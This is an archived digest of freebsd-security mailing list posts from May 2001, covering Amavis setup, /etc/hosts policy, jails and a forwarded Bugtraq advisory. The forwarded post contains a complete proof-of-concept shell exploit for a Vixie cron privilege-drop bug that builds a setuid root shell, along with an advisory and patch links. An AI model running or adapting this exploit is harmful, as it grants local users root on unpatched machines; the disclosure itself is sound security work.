heckfordj@psi-domain.co.uk) Received: from smtp.psi-domain.co.uk (mail.trident-uk.co.uk [195.166.16.10]) by rafiu.psi-domain.co.uk (Postfix) with SMTP id 73EC4402EC6; Tue, 8 May 2001 14:48:16 +0100 (BST) Date: Tue, 8 May 2001 15:51:33 +0100 From: Jamie Heckford To: Peter Pentchev Cc: freebsd-security@freebsd.org Subject: Re: Problems with Amavis setup Message-ID: <20010508155133.C675@storm.psi-domain.co.uk> Reply-To: heckfordj@psi-domain.co.uk References: <20010508094002.41629.qmail@web13802.mail.yahoo.com> <20010508175735.A1248@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit In-Reply-To: <20010508175735.A1248@ringworld.oblivion.bg>; from roam@orbitel.bg on Tue, May 08, 2001 at 15:57:35 +0100 X-Mailer: Balsa 1.1.1 Lines: 55 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I think the file distributed with FreeBSD is different from the version distributed with popular Linux Distros. Think the Linux one allows you to do something special "grep" style. Jamie On 2001.05.08 15:57 Peter Pentchev wrote: > On Tue, May 08, 2001 at 02:40:02AM -0700, John Braun wrote: > > Hi! > > > > I can't download "file" command for "Amavis" from > > > > ftp://ftp.astron.com/pub/file/, > > ftp://ftp.gw.com/pub/unix/file/ and > > ftp://ftp.funet.fi/pub/unix/tools/file/. > > > > Where can I get this command ? > > The 'file' command is part of FreeBSD; it is installed as part of > the FreeBSD installation. Look for it in /usr/bin. If Amavis > cannot execute the 'file' command, make sure it has /usr/bin in > its path. > > G'luck, > Peter > > -- > This sentence no verb. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > -- Jamie Heckford Network Operations Manager Psi-Domain - Innovative Linux Solutions. Ask Us How. FreeBSD - The power to serve Join our mailing list and stay informed by emailing majordomo@psi-domain.co.uk with the line: subscribe collective ===================================== email: heckfordj@psi-domain.co.uk web: http://www.psi-domain.co.uk/ tel: +44 (0)1737 789 246 fax: +44 (0)1737 789 245 mobile: +44 (0)7866 724 224 ===================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 6:59:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from web13804.mail.yahoo.com (web13804.mail.yahoo.com [216.136.175.14]) by hub.freebsd.org (Postfix) with SMTP id EDC1537B43E for ; Tue, 8 May 2001 06:59:42 -0700 (PDT) (envelope-from uktests@yahoo.com) Message-ID: <20010508135942.70161.qmail@web13804.mail.yahoo.com> Received: from [159.148.130.2] by web13804.mail.yahoo.com; Tue, 08 May 2001 06:59:42 PDT Date: Tue, 8 May 2001 06:59:42 -0700 (PDT) From: John Braun Subject: Re: Problems with Amavis setup To: freebsd-security@freebsd.org In-Reply-To: <20010508175735.A1248@ringworld.oblivion.bg> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ofcourse, FreeBSD has this command, but Amavis requires command file with option -b. If I don't mistake in version 4.1. hasn't this option. Where can I get source or package for this command? Or someone know howto install Amavis without 'file -b'? --- Peter Pentchev wrote: > On Tue, May 08, 2001 at 02:40:02AM -0700, John Braun > wrote: > > Hi! > > > > I can't download "file" command for "Amavis" from > > > > ftp://ftp.astron.com/pub/file/, > > ftp://ftp.gw.com/pub/unix/file/ and > > ftp://ftp.funet.fi/pub/unix/tools/file/. > > > > Where can I get this command ? > > The 'file' command is part of FreeBSD; it is > installed as part of > the FreeBSD installation. Look for it in /usr/bin. > If Amavis > cannot execute the 'file' command, make sure it has > /usr/bin in > its path. > > G'luck, > Peter > > -- > This sentence no verb. __________________________________________________ Do You Yahoo!? Yahoo! Auctions - buy the things you want at great prices http://auctions.yahoo.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 7:39:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 3400937B422 for ; Tue, 8 May 2001 07:39:47 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 833 invoked by uid 1000); 8 May 2001 15:51:49 -0000 Date: Tue, 8 May 2001 18:51:49 +0300 From: Peter Pentchev To: John Braun Cc: freebsd-security@freebsd.org Subject: Re: Problems with Amavis setup Message-ID: <20010508185149.A430@ringworld.oblivion.bg> Mail-Followup-To: John Braun , freebsd-security@freebsd.org References: <20010508175735.A1248@ringworld.oblivion.bg> <20010508135942.70161.qmail@web13804.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010508135942.70161.qmail@web13804.mail.yahoo.com>; from uktests@yahoo.com on Tue, May 08, 2001 at 06:59:42AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, May 08, 2001 at 06:59:42AM -0700, John Braun wrote: > Ofcourse, FreeBSD has this command, but > Amavis requires command file with option -b. > If I don't mistake in version 4.1. hasn't this > option. > > Where can I get source or package for this command? > > Or someone know howto install Amavis without 'file > -b'? Oh, yes, that's correct - the version of file(1) in FreeBSD 4.1 does not yet have the '-b' option. You can get a newer version of file(1) from the FreeBSD CVS repository at http://www.FreeBSD.org/cgi/cvsweb.cgi or from an ISO image of FreeBSD 4.3. If you're interested, I could send you the sources myself. You need the src/usr.bin/file/ directory, but also the src/contrib/file/ tree, for it is there that the file(1) sources live now. G'luck, Peter -- This sentence is false. > --- Peter Pentchev wrote: > > On Tue, May 08, 2001 at 02:40:02AM -0700, John Braun > > wrote: > > > Hi! > > > > > > I can't download "file" command for "Amavis" from > > > > > > ftp://ftp.astron.com/pub/file/, > > > ftp://ftp.gw.com/pub/unix/file/ and > > > ftp://ftp.funet.fi/pub/unix/tools/file/. > > > > > > Where can I get this command ? > > > > The 'file' command is part of FreeBSD; it is > > installed as part of > > the FreeBSD installation. Look for it in /usr/bin. > > If Amavis > > cannot execute the 'file' command, make sure it has > > /usr/bin in > > its path. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 7:53: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from mdma.playboy.com (mdma.playboy.com [216.163.140.20]) by hub.freebsd.org (Postfix) with ESMTP id C067237B422 for ; Tue, 8 May 2001 07:52:55 -0700 (PDT) (envelope-from jamie@playboy.com) Received: by mdma.playboy.com (Postfix, from userid 100) id 813F512794; Tue, 8 May 2001 09:52:49 -0500 (CDT) Date: Tue, 8 May 2001 09:52:49 -0500 From: jamie rishaw To: John Braun Cc: freebsd-security@freebsd.org Subject: Re: Problems with Amavis setup Message-ID: <20010508095249.O22195@playboy.com> References: <20010508175735.A1248@ringworld.oblivion.bg> <20010508135942.70161.qmail@web13804.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010508135942.70161.qmail@web13804.mail.yahoo.com>; from uktests@yahoo.com on Tue, May 08, 2001 at 06:59:42AM -0700 X-No-Archive: yes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I put a copy of the 'file' that I use for amavis on my personal colo, if you want it. I can't seem to find source, but this should help.. I put it in /usr/local/bin/file It's at http://arpa.com/~jamie/bin/file.gz It was compiled on a 4.2-R box.. MD5 (file.gz) = 39f517d2495b20d2b95f08123eaed38a MD5 (/usr/local/bin/file) = 728db5c95258ef828ee224b1b197d74a Regards, jamie On Tue, May 08, 2001 at 06:59:42AM -0700, John Braun wrote: > Ofcourse, FreeBSD has this command, but > Amavis requires command file with option -b. > If I don't mistake in version 4.1. hasn't this > option. > > Where can I get source or package for this command? > > Or someone know howto install Amavis without 'file > -b'? > > > --- Peter Pentchev wrote: > > On Tue, May 08, 2001 at 02:40:02AM -0700, John Braun > > wrote: > > > Hi! > > > > > > I can't download "file" command for "Amavis" from > > > > > > ftp://ftp.astron.com/pub/file/, > > > ftp://ftp.gw.com/pub/unix/file/ and > > > ftp://ftp.funet.fi/pub/unix/tools/file/. > > > > > > Where can I get this command ? > > > > The 'file' command is part of FreeBSD; it is > > installed as part of > > the FreeBSD installation. Look for it in /usr/bin. > > If Amavis > > cannot execute the 'file' command, make sure it has > > /usr/bin in > > its path. > > > > G'luck, > > Peter > > > > -- > > This sentence no verb. > > > __________________________________________________ > Do You Yahoo!? > Yahoo! Auctions - buy the things you want at great prices > http://auctions.yahoo.com/ > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- jamie rishaw sr. wan/unix engineer/ninja // playboy enterprises inc. opinions stated are mine, and are not necessarily those of the bunny. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 8:31:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 7409C37B422 for ; Tue, 8 May 2001 08:31:35 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id LAA62449; Tue, 8 May 2001 11:31:25 -0400 (EDT) (envelope-from wollman) Date: Tue, 8 May 2001 11:31:25 -0400 (EDT) From: Garrett Wollman Message-Id: <200105081531.LAA62449@khavrinen.lcs.mit.edu> To: Sheldon Hearn Cc: freebsd-security@FreeBSD.ORG Subject: Re: reverse or not In-Reply-To: <98864.989254731@axl.fw.uunet.co.za> References: <3AF6D34C.AE6A479F@globalstar.com> <98864.989254731@axl.fw.uunet.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > 2) Hosts should have hostnames for the loopback network > hardwired into /etc/hosts. Our policy here is just the opposite: hosts should not even have `/etc/hosts' files, and should they by some twist of fate gain one, the resolver should be configured to ignore it. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 10:24:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id 560D637B422 for ; Tue, 8 May 2001 10:24:42 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GD11OK00.U2R; Tue, 8 May 2001 10:24:20 -0700 Message-ID: <3AF82BD9.F474AFB6@globalstar.com> Date: Tue, 08 May 2001 10:24:41 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Garrett Wollman Cc: Sheldon Hearn , freebsd-security@FreeBSD.ORG Subject: Re: reverse or not References: <3AF6D34C.AE6A479F@globalstar.com> <98864.989254731@axl.fw.uunet.co.za> <200105081531.LAA62449@khavrinen.lcs.mit.edu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Garrett Wollman wrote: > > < said: > > > 2) Hosts should have hostnames for the loopback network > > hardwired into /etc/hosts. > > Our policy here is just the opposite: hosts should not even have > `/etc/hosts' files, and should they by some twist of fate gain one, > the resolver should be configured to ignore it. Well, if you are talking about Athena, that computer environment is fairly "unique" to say the least. Kind of strange to have a pretty secure computing environment where every person on the campus knows the root password to every public workstation. (Unless things have changed.) It's an interesting security model. -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 10:59: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 459DA37B422 for ; Tue, 8 May 2001 10:58:59 -0700 (PDT) (envelope-from Gerhard.Sittig@gmx.net) Received: (qmail 3128 invoked by uid 0); 8 May 2001 17:58:55 -0000 Received: from p3ee21614.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.20) by mail.gmx.net (mp020-rz3) with SMTP; 8 May 2001 17:58:55 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id SAA15840 for freebsd-security@FreeBSD.ORG; Tue, 8 May 2001 18:16:51 +0200 Date: Tue, 8 May 2001 18:16:51 +0200 From: Gerhard Sittig To: freebsd-security@FreeBSD.ORG Subject: Re: Problems with Amavis setup Message-ID: <20010508181651.O253@speedy.gsinet> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <20010508094002.41629.qmail@web13802.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20010508094002.41629.qmail@web13802.mail.yahoo.com>; from uktests@yahoo.com on Tue, May 08, 2001 at 02:40:02AM -0700 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, May 08, 2001 at 02:40 -0700, John Braun wrote: > > I can't download "file" command for "Amavis" from > > ftp://ftp.astron.com/pub/file/, > ftp://ftp.gw.com/pub/unix/file/ and > ftp://ftp.funet.fi/pub/unix/tools/file/. > > Where can I get this command ? It comes with your system. It's already on your disk. $ uname -sr FreeBSD 4.2-STABLE $ which file /usr/bin/file $ man file ... "/brief" OPTIONS -b Do not prepend filenames to output lines (brief mode). ... HISTORY There has been a file command in every UNIX since at least Research Ver- sion 6 (man page dated January, 1975). [ ... ] ... BTW: You do use the security/amavis port, don't you? virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 11:13:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from sol.serv.u-szeged.hu (sol.serv.u-szeged.hu [160.114.51.3]) by hub.freebsd.org (Postfix) with ESMTP id 4195037B423 for ; Tue, 8 May 2001 11:13:09 -0700 (PDT) (envelope-from sziszi@petra.hos.u-szeged.hu) Received: from petra.hos.u-szeged.hu by sol.serv.u-szeged.hu (8.9.3+Sun/SMI-SVR4) id UAA02526; Tue, 8 May 2001 20:13:06 +0200 (MEST) Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian)) id 14xByt-0000gk-00 for ; Tue, 08 May 2001 20:13:07 +0200 Date: Tue, 8 May 2001 20:13:07 +0200 From: Szilveszter Adam To: security@freebsd.org Subject: Fwd: Vixie cron vulnerability Message-ID: <20010508201307.A2613@petra.hos.u-szeged.hu> Mail-Followup-To: Szilveszter Adam , security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, I hate to disturb, but... I cannot reproduce this, but... are we affected? This looks like rather new... ----- Forwarded message from Cade Cairns ----- X-Sender: Date: Mon, 7 May 2001 16:08:49 -0600 Sender: Bugtraq List From: Cade Cairns Subject: Vixie cron vulnerability To: BUGTRAQ@SECURITYFOCUS.COM Greetings Bugtraqers, Attached is a simple proof of concept for the vixie cron vulnerability recently published in Debian Security Advisory DSA-054-1. The code was written during SIA analysis of this vulnerability. Further information on the vulnerability may be found in the SecurityFocus SIA commercial alert, also attached to this message. Cade Cairns SecurityFocus http://www.securityfocus.com/ #!/bin/sh # # cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1 # # synopsis: # the crontab file maintenance program (crontab) fails to drop privileges # before invoking the editor under certain circumstances. # # description: # a serialization error exists in some versions of the file maintenance # program, crontab. the vulnerability was introduced in versions which # were patched for seperate vulnerability in fall of 2000 (see Bugtraq # ID #1960). # # when a parsing error occurs after a modification operation, crontab will # fail to drop privileges correctly for subsequent modification operations. # because the program is installed setuid root, it may be possible for a # local user to gain root privileges. # # affected versions: # cron_3.0pl1-57.2 distributed with Debian Linux 2.2. # # note that copies of the program with the patch mentioned above are likely # to also be vulnerable. # # references: # http://www.securityfocus.com/bid/2687 # # 05/07/01 cairnsc@securityfocus.com CRONTAB=/usr/bin/crontab if ! test -x $CRONTAB; then echo "** unable to locate crontab executable, exiting" exit 1 fi cat > vcsh.c << EOF #include int main() { setuid(0); setgid(0); execl("/bin/sh", "sh", NULL); } EOF echo "** compiling shell wrapper as $PWD/vcsh" cc -o $PWD/vcsh $PWD/vcsh.c if ! test -x $PWD/vcsh; then echo "** compilation failed, exiting" exit 1 fi echo "** creating simple exploit script as $PWD/vcex.sh" cat > vcex.sh << EOF #!/bin/sh sleep 1 && echo "foo" >> \$1 if test -f $PWD/vcboom; then chown root.root $PWD/vcsh chmod 4755 $PWD/vcsh rm $PWD/vcboom else touch $PWD/vcboom fi EOF chmod 0755 $PWD/vcex.sh echo "** running $CRONTAB -e" echo "**" echo "** enter 'yes' at the first prompt, then enter 'no' at the second" echo (EDITOR=$PWD/vcex.sh $CRONTAB -e) echo echo "** done, the shell wrapper should be suid root" exit 0 Thank you for using SecurityFocus.com's Security Intelligence Alert (SIA) Service. To manage account please visit https://alerts.securityfocus.com/ For questions or comments email us at alerts@securityfocus.com. --------------------------------------------------------------------------- Security Alert Subject: Vixie Cron crontab Privilege Lowering Failure Vulnerability BUGTRAQ ID: 2687 CVE ID: CVE-MAP-NOMATCH Published: May 07, 2001 Updated: May 07, 2001 Remote: No Local: Yes Availability: User Initiated Authentication: Not Required Credibility: Vendor Confirmed Ease: Exploit Available Class: Serialization Error Impact: 10.00 Severity: 6.90 Urgency: 7.59 Last Change: Initial analysis. --------------------------------------------------------------------------- Vulnerable Systems: Paul Vixie Vixie Cron 3.0pl1 + Debian Linux 2.2 sparc + Debian Linux 2.2 powerpc + Debian Linux 2.2 arm + Debian Linux 2.2 alpha + Debian Linux 2.2 68k + Debian Linux 2.2 Non-Vulnerable Systems: Summary: Local users can cause Vixie crontab to fail to drop privileges when editing files. Can lead to full system compromise. Impact: Local users can manipulate crontab's lowering of privileges, leading to full system compromise. Technical Description: Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times. A serialization error exists in some versions of the crontab file maintenance program. The vulnerability was introduced in versions which were patched for seperate vulnerability in fall of 2000 (see Bugtraq ID #1960). When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations. Because the program is installed setuid root, it may be possible for a local user to gain root privileges. Attack Scenarios: An attacker with local access must edit their crontab file and enter a line that causes the parser to fail. The attacker must then enter 'yes' when prompted as to whether he or she wishes to attempt to fix the error in the file. This will cause the editor to be invoked again, but with full privileges. The attacker could then execute arbitrary commands from the editor, or overwrite otherwise protected system files. Exploits: During SIA analysis of this vulnerability, Cade Cairns wrote proof-of-concept exploit code. http://www.securityfocus.com/data/vulnerabilities/exploits/cronboom.sh Mitigating Strategies: Restricting local access to the host may prevent unauthorized users from exploiting this vulnerability. Restrict access to the cron faciliy to trusted users via the /etc/cron.allow and /etc/cron.deny files (man crontab). Solutions: For Paul Vixie Vixie Cron 3.0pl1: Debian upgrade 2.2 alpha cron_3.0pl1-57.3_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/cro n_3.0pl1-57.3_alpha.deb Debian upgrade 2.2 arm cron_3.0pl1-57.3_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/cron_ 3.0pl1-57.3_arm.deb Debian upgrade 2.2 i386 cron_3.0pl1-57.3_i386.deb http://security.debian.org/dists/stable/updates/main/binary-i386/cron _3.0pl1-57.3_i386.deb Debian upgrade 2.2 m68k cron_3.0pl1-57.3_m68k.deb http://security.debian.org/dists/stable/updates/main/binary-m68k/cron _3.0pl1-57.3_m68k.deb Debian upgrade 2.2 ppc cron_3.0pl1-57.3_powerpc.deb http://security.debian.org/dists/stable/updates/main/binary-powerpc/c ron_3.0pl1-57.3_powerpc.deb Debian upgrade 2.2 sparc cron_3.0pl1-57.3_sparc.deb http://security.debian.org/dists/stable/updates/main/binary-sparc/cro n_3.0pl1-57.3_sparc.deb Credit: Posted to Bugtraq in a Debian Security Advisory (DSA-054-1) on May 7, 2001. References: advisory: Debian DSA-054-1: cron http://www.securityfocus.com/advisories/3282 ChangeLog: May 07, 2001: Initial analysis. --------------------------------------------------------------------------- HOW TO INTERPRET THIS ALERT BUGTRAQ ID: This is a unique identifier assigned to the vulnerability by SecurityFocus.com. CVE ID: This is a unique identifier assigned to the vulnerability by the CVE. Published: The date the vulnerability was first made public. Updated: The date the information was last updated. Remote: Whether this is a remotely exploitable vulnerability. Local: Whether this is a locally exploitable vulnerability. Credibility: Describes how credible the information about the vulnerability is. Possible values are: Conflicting Reports: The are multiple conflicting about the existance of the vulnerability. Single Source: There is a single non-reliable source reporting the existence of the vulnerability. Reliable Source: There is a single reliable source reporting the existence of the vulnerability. Conflicting Details: There is consensus on the existence of the vulnerability but not it's details. Multiple Sources: There is consensus on the existence and details of the vulnerability. Vendor Confirmed: The vendor has confirmed the vulnerability. Class: The class of vulnerability. Possible values are: Boundary Condition Error, Access Validation Error, Origin Validation Error, Input Valiadtion Error, Failure to Handle Exceptional Conditions, Race Condition Error, Serialization Error, Atomicity Error, Environment Error, and Configuration Error. Ease: Rates how easiliy the vulnerability can be exploited. Possible values are: No Exploit Available, Exploit Available, and No Exploit Required. Impact: Rates the impact of the vulnerability. It's range is 1 through 10. Severity: Rates the severity of the vulnerability. It's range is 1 through 10. It's computed from the impact rating and remote flag. Remote vulnerabiliteis with a high impact rating receive a high severity rating. Local vulnerabilities with a low impact rating receive a low severity rating. Urgency: Rates how quickly you should take action to fix or mitigate the vulnerability. It's range is 1 through 10. It's computed from the severity rating, the ease rating, and the credibility rating. High severity vulnerabilities with a high ease rating, and a high confidence rating have a higher urgency rating. Low severity vulnerabilities with a low ease rating, and a low confidence rating have a lower urgency rating. Last Change: The last change made to the vulnerability information. Vulnerable Systems: The list of vulnerable systems. A '+' preceding a system name indicates that one of the system components is vulnerable vulnerable. For example, Windows 98 ships with Internet Explorer. So if a vulnerability is found in IE you may see something like: Microsoft Internet Explorer + Microsoft Windows 98 Non-Vulnerable Systems: The list of non-vulnerable systems. Summary: A concise summary of the vulnerability. Impact: The impact of the vulnerability. Technical Description: The in-depth description of the vulnerability. Attack Scenarios: Ways an attacker may make use of the vulnerability. Exploits: Exploit intructions or programs. Mitigating Strategies: Ways to mitigate the vulnerability. Solutions: Solutions to the vulnerability. Credit: Information about who disclosed the vulnerability. References: Sources of information on the vulnerability. Related Resources: Resources that might be of additional value. ChangeLog: History of changes to the vulnerability record. --------------------------------------------------------------------------- Copyright 2001 SecurityFocus.com Thank you for using SecurityFocus.com's Security Intelligence Alert (SIA) Service. To manage your account please visit https://alerts.securityfocus.com/ For questions or comments email us at alerts@securityfocus.com. ----- End forwarded message ----- -- Regards: Szilveszter ADAM Szeged University Szeged Hungary To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 11:16:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from scribble.fsn.hu (scribble.fsn.hu [193.224.40.95]) by hub.freebsd.org (Postfix) with SMTP id 8548237B42C for ; Tue, 8 May 2001 11:16:36 -0700 (PDT) (envelope-from bra@fsn.hu) Received: (qmail 61544 invoked by uid 1000); 8 May 2001 18:09:36 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 8 May 2001 18:09:36 -0000 Date: Tue, 8 May 2001 20:09:36 +0200 (CEST) From: Attila Nagy To: Subject: Re: Jails and FreeBSD4.3 In-Reply-To: <20010507132904.E33043@moo.udder.org> Message-ID: <20010508200734.B61277-100000@scribble.fsn.hu> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, > Yeah, it would be nice if you could bind the jail to a list of IPs > or whatever. It seems like it would be the kind of functionality that > would be desired by more people than just be. Right now, it's the > only thing preventing me from moving anything over to a jail. Almost > every service I run needs more than one IP.My $0.02. I misunderstood hte original question, I thought of a name based apache vhost running on multiple IPs, not IP based vhosts... -------------------------------------------------------------------------- Attila Nagy e-mail: Attila.Nagy@fsn.hu Budapest Polytechnic (BMF.HU) @work: +361 210 1415 (194) H-1084 Budapest, Tavaszmezo u. 15-17. cell.: +3630 306 6758 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 13: 6:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from mercury.ipdvbnet.com (adsl-216-100-228-204.dsl.snfc21.pacbell.net [216.100.228.204]) by hub.freebsd.org (Postfix) with ESMTP id 9C3EE37B424 for ; Tue, 8 May 2001 13:06:26 -0700 (PDT) (envelope-from Greg.Haa@amux.com) Received: from sunking.ipdvbnet.com (sunking2 [192.168.255.16]) by mercury.ipdvbnet.com (8.11.1/8.11.1) with ESMTP id f48K6Cm10184 for ; Tue, 8 May 2001 13:06:17 -0700 (PDT) (envelope-from Greg.Haa@amux.com) Received: by SUNKING with Internet Mail Service (5.5.2650.21) id ; Tue, 8 May 2001 13:06:11 -0700 Message-ID: <2BFD35C3F1F9D31185CE00B0D02023028386DA@SUNKING> From: Greg Haa To: "'freebsd-security@FreeBSD.ORG'" Subject: Date: Tue, 8 May 2001 13:06:06 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hey all. Can anyone tell me what this means? May 8 10:34:11 mercury named[7608]: stream_getlen([209.67.29.10].2200): request too small May 8 10:34:11 mercury named[7608]: stream_getlen([209.67.29.10].2201): request too small May 8 10:34:11 mercury named[7608]: stream_getlen([209.67.29.10].2202): request too small I have no idea if this is even the right list or if it is a cesurity problem. TIA greg To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 14:40:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-108.dsl.lsan03.pacbell.net [63.207.60.108]) by hub.freebsd.org (Postfix) with ESMTP id 3AB1937B423 for ; Tue, 8 May 2001 14:40:25 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 0899D67AFE; Tue, 8 May 2001 14:40:21 -0700 (PDT) Date: Tue, 8 May 2001 14:40:20 -0700 From: Kris Kennaway To: Szilveszter Adam Cc: security@FreeBSD.ORG Subject: Re: Fwd: Vixie cron vulnerability Message-ID: <20010508144020.C2823@xor.obsecurity.org> References: <20010508201307.A2613@petra.hos.u-szeged.hu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="dkEUBIird37B8yKS" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010508201307.A2613@petra.hos.u-szeged.hu>; from sziszi@petra.hos.u-szeged.hu on Tue, May 08, 2001 at 08:13:07PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --dkEUBIird37B8yKS Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, May 08, 2001 at 08:13:07PM +0200, Szilveszter Adam wrote: > Hello, >=20 > I hate to disturb, but... =20 >=20 > I cannot reproduce this, but... are we affected? This looks like rather > new... I checked this when I first heard about it and we don't seem to be. I don't even know where that version came from, it might be a linux-originated thing. Kris --dkEUBIird37B8yKS Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6+GfEWry0BWjoQKURAsREAJ0ZRSF0gY/Fauz3ARbp2UeqSknSyACfasp7 PRg0d4PnEvWjbQ6MF53vowY= =emmR -----END PGP SIGNATURE----- --dkEUBIird37B8yKS-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 14:59:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from moo.udder.org (moo.udder.org [207.183.249.210]) by hub.freebsd.org (Postfix) with ESMTP id 5EB8737B43C for ; Tue, 8 May 2001 14:59:11 -0700 (PDT) (envelope-from dave@moo.udder.org) Received: (from dave@localhost) by moo.udder.org id f48Lwks15578; Tue, 8 May 2001 14:58:46 -0700 (PDT) Date: Tue, 8 May 2001 14:58:46 -0700 From: Dave Whitaker To: Attila Nagy Cc: freebsd-security@freebsd.org Subject: Re: Jails and FreeBSD4.3 Message-ID: 